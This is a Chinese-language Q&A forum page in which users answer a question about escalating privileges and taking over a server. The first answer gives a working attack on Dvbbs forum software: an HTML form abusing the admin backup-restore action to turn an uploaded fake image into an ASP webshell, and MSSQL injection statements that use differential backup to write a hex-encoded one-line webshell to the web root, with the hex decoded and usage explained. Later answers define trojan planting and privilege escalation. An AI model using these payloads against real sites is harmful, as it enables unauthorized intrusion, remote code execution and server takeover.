怎么提权并拿下服务器?

发布网友 发布时间:2022-04-23 12:37

我来回答

4个回答

热心网友 时间:2022-05-03 11:34

1.试试在后台能不能修改配置文件,修改上传文件的类型,能的话就填加asp文件
2.如果是asp+mssql系统,这里需要提一点动网mssql版,但是可以直接本地提交来备份的。首先在发帖那上传一个写有asp代码的假图片,然后记住其上传路径。写一个本地提交的表单,代码如下:

  <form action=http://网站/bbs/admin_data.asp?action=RestoreData&act=Restore method="post">

  <p>已上传文件的位置:<input name="Dbpath" type="text" size="80"></p>

  <p>要复制到的位置:<input name="backpath" type="text" size="80"></p>

  <p><input type="submit" value="提交"></p> </form>

  另存为.htm本地执行。把假图片上传路径填在“已上传文件的位置”那里,想要备份的WebShell的相对路径填写在“要复制到的位置”那里,提交就得到我们可爱的WebShell了,恢复代码和此类似,修改相关地方就可以了。没有遇到过后台执行mssql命令比较强大的asp程序后台,动网的数据库还原和备份是个摆设,不能执行sql命令备份webshell,只能执行一些简单的查询命令。可以利用mssql注入差异备份webshell,一般后台是显示了绝对路径,只要有了注入点基本上就可以差异备份成功。下面是差异备份的主要语句代码,利用动网7.0的注入漏洞可以用差异备份一个webshell,可以用利用上面提到的方法,将conn.asp文件备份成.txt文件而获得库名。

  差异备份的主要代码:

  ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x626273 backup database @a to disk=@s--

  ;Drop table [heige];create table [dbo].[heige] ([cmd] [image])--

  ;insert into heige(cmd) values(0x3C2565786563757465207265717565737428226C2229253E)--

  ;declare @a sysname,@s varchar(4000) select @a=db_name(),@s=0x3A5C7765625C312E617370 backup database @a to disk=@s WITH DIFFERENTIAL,FORMAT--

  这段代码中,0x626273是要备份的库名bbs的十六进制,可以是其他名字比如bbs.bak; 0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp最小马;0x3A5C7765625C312E617370是d:\web\1.asp的十六进制,也就是你要备份的webshell路径。当然也可以用比较常见备份方式来获得webshell,唯一的不足就是备份后的文件过大,如果备份数据库中有防下载的的数据表,或者有错误的asp代码,备份出来的webshell就不会成功运行,利用差异备份是成功率比较高的方法,并且极大的减少备份文件的大小。

由于不知道你那的具体情况,是能随便找了点东西给你,希望能帮到你

热心网友 时间:2022-05-03 12:52

挂马只的是利用网站漏洞将自己的木马放在网站服务器上,通过一定的windows系统漏洞来达到打开网站就中马的效果。
删东西当然就是删掉服务器上的东西了。
提权一办指通过webshell拿到整个服务器的权限

热心网友 时间:2022-05-03 14:27

就是将原本的低权限通过系统的漏洞或本地溢出等方法将自身建立的用户提升为管理员或root权限。

热心网友 时间:2022-05-03 16:18

这个肯能0x3C2565786563757465207265717565737428226C2229253E是<%execute request("l")%>的十六进制,是lp 这个是最小

声明声明:本网页内容为用户发布,旨在传播知识,不代表本网认同其观点,若有侵权等问题请及时与本网联系,我们将在第一时间删除处理。E-MAIL:11247931@qq.com